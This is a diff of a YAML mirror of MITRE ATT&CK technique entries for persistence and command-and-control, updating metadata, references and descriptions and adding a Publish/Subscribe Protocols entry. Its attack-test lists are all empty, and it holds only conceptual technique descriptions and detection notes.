+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36568,7 +37000,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36592,12 +37024,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36681,11 +37111,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36737,9 +37166,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36788,7 +37216,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36826,14 +37254,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36896,7 +37322,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -36954,97 +37379,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -37110,9 +37533,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -37158,7 +37639,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -37190,7 +37670,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -37212,22 +37692,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37249,7 +37727,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37274,7 +37752,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -37358,7 +37835,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -37422,11 +37898,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37510,7 +37985,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -37541,7 +38015,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37561,8 +38035,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37584,8 +38058,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37647,7 +38119,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37695,7 +38166,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37749,7 +38219,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37782,7 +38251,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37802,8 +38271,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37841,7 +38308,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37869,42 +38336,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37913,17 +38360,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
